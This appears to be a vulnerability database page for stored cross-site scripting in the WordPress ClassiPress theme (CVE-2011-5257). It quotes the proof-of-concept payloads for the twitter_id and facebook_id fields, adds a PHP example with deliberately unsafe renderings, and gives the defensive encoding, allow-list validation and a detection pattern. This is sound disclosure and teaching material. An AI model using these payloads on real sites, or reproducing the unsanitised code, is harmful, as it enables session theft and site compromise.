WordPress Classipress Theme Multiple Cross-Site Scripting Vulnerabilities

Vulnerability ID: 1120587
Vulnerability type: Cross-site scripting
Published: 2011-10-31
Updated: 2013-02-14
CVE ID: CVE-2011-5257
CNNVD ID: CNNVD-201302-160
Platform: PHP
CVSS score: 4.3
|Vulnerability Sources
https://www.exploit-db.com/exploits/18053
https://www.securityfocus.com/bid/50433
https://cxsecurity.com/issue/WLB-2011110001
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201302-160
|Vulnerability Details
Multiple cross-site scripting vulnerabilities exist in versions of the Classipress theme for WordPress before 3.1.5. A remote attacker can inject arbitrary web script or HTML via (1) the twitter_id parameter, used by the Twitter widget, and (2) the facebook_id parameter, used by the Facebook widget.
|Vulnerability Exploit
# Exploit Title: WordPress Classipress Theme <= 3.1.4 Stored XSS
# Date: 2011-09-26
# Author: Paul Loftness
# Contact: http://attackvectorlabs.blogspot.com
# Vendor: Appthemes LLC.
# Product Web Page: http://www.appthemes.com/themes/classipress/
# Version: <=3.1.4
# Tested Versions: 3.1.4, 3.0.5.3

Summary:
-------------------------
ClassiPress is a popular and widely used classified ads software for WordPress. 

Description: 
-------------------------
Classipress is vulnerable to multiple stored XSS vulnerabilities. Input through the POST parameters 'facebook_id' and 'twitter_id' in a registered user's profile page is either not sanitised or poorly sanitised (version specific), allowing the attacker to insert JavaScript code.

In version 3.0.5.2 and presumably all previous versions, no sanitisation is in place, allowing an attacker to insert code within a tag or to break out of it. In version 3.1.4, the less-than character is sanitised, but an attacker can still insert quotes and place an event handler in the tag.


Proof-of-Concept Code:
-------------------------

Insertion page: http://example_site/author/profile/
Infected page : http://example_site/author/attacker_username/
Note: Some sites replace "author" with another path, this is not a vanilla configuration, however. 

Version: ClassiPress 3.0.5.2
Vulnerable Input Parameters:

	twitter_id:  " onmouseover="alert('XSS');
	facebook_id: " onmouseover="alert('XSS');

	Alternate Exploit code:
	twitter_id:  "><script>alert('XSS');</script><div id="
	facebook_id: "><script>alert('XSS');</script><div id="


Version: ClassiPress 3.1.4
Vulnerable Input Parameters:

	twitter_id:  " onmouseover='alert("XSS");'><
	facebook_id: " onmouseover='alert("XSS");'><

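The description above turns on one point a defender should take from this advisory: removing a single character (the less-than sign) is not output encoding, because inside a double-quoted HTML attribute the quote character is what ends the attribute, and an event handler needs no new tag. The following PHP, written for this page as an added example and not code from the ClassiPress theme or the advisory author, renders a Twitter handle into a widget's anchor tag three ways (no sanitisation as in 3.0.5.x, less-than stripping as in 3.1.4, and context-correct encoding), and adds the allow-list check a profile form should apply when the value is saved. The function names, the anchor markup and the regular expressions are assumptions for illustration; in a real WordPress theme the encoding step would be esc_attr() or esc_url(), and htmlspecialchars() is used here only so the file runs without WordPress loaded. The sample inputs are the advisory's own payloads plus one constructed legitimate handle.

```php
<?php
// Added example (not ClassiPress code). Three renderings of a user-supplied
// Twitter handle into an attribute, plus save-time validation and a
// detection helper for values already stored in the database.

// 1. No sanitisation, as the advisory describes for 3.0.5.x: the raw value
//    lands inside the href attribute, so a quote ends the attribute and
//    '<' can open a new tag.
function render_twitter_widget_unsanitised(string $twitter_id): string {
    return '<a href="http://twitter.com/' . $twitter_id . '">Twitter</a>';
}

// 2. Stripping only '<', the partial fix the advisory describes for 3.1.4:
//    no new tag can be opened, but a quote still closes the attribute and
//    an event handler can be added to the existing <a> tag.
function render_twitter_widget_strip_lt(string $twitter_id): string {
    $cleaned = str_replace('<', '', $twitter_id);
    return '<a href="http://twitter.com/' . $cleaned . '">Twitter</a>';
}

// 3. Context-correct output encoding: every character that has meaning
//    inside a double-quoted attribute (both quote styles, '<', '>', '&')
//    is encoded, so the value can only ever be attribute text.
//    WordPress equivalent: esc_attr() / esc_url().
function render_twitter_widget_escaped(string $twitter_id): string {
    $safe = htmlspecialchars($twitter_id, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<a href="http://twitter.com/' . $safe . '">Twitter</a>';
}

// 4. Validation on save: a social-network handle never legitimately contains
//    quotes, angle brackets or whitespace, so accept only a small allow-list
//    (assumed character set and length) instead of trying to clean bad input.
function is_valid_social_handle(string $handle): bool {
    return (bool) preg_match('/^[A-Za-z0-9_.]{1,50}$/', $handle);
}

// Detection helper for values already in the database: flag anything that
// could terminate an attribute or carry an on*= event handler, so a site
// owner can audit stored profiles after upgrading.
function attribute_breakout_suspected(string $value): bool {
    return (bool) preg_match('/["\']|<|\bon[a-z]+\s*=/i', $value);
}

// Constructed sample inputs: one legitimate handle and the payloads quoted
// in the advisory above.
$samples = [
    'legit_user',
    '" onmouseover="alert(\'XSS\');',
    '"><script>alert(\'XSS\');</script><div id="',
    '" onmouseover=\'alert("XSS");\'><',
];

foreach ($samples as $value) {
    printf("input: %s\n", $value);
    printf("  valid handle?       %s\n", is_valid_social_handle($value) ? 'yes' : 'no');
    printf("  breakout suspected? %s\n", attribute_breakout_suspected($value) ? 'yes' : 'no');
    printf("  unsanitised: %s\n", render_twitter_widget_unsanitised($value));
    printf("  strip '<':   %s\n", render_twitter_widget_strip_lt($value));
    printf("  escaped:     %s\n", render_twitter_widget_escaped($value));
    echo "\n";
}
```

Running the file shows that only the legitimate handle passes is_valid_social_handle(), that the 3.1.4-style less-than stripping still emits an `onmouseover=` attribute for the first and third payloads, and that the encoded rendering turns every quote and angle bracket in all three payloads into an entity. The two defensive layers are independent: the allow-list stops bad values from being stored, and the output encoding protects the page even for values that were stored before the check existed.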

Timeline:
-------------------------
Vulnerability Discovered: 8/10/2011
Vulnerability Reported to Vendor: 9/1/2011
Patch Released with version 3.1.5: 10/7/2011
|Affected Products
AppThemes Classipress 3.1.4
AppThemes Classipress 3.0.5.3
|References

Source: OSVDB
Name: 76712
Link: http://www.osvdb.org/76712
Source: EXPLOIT-DB
Name: 18053
Link: http://www.exploit-db.com/exploits/18053
Source: SECUNIA
Name: 46658
Link: http://secunia.com/advisories/46658
Source: docs.appthemes.com
Link: http://docs.appthemes.com/classipress/classipress-version-3-1-5/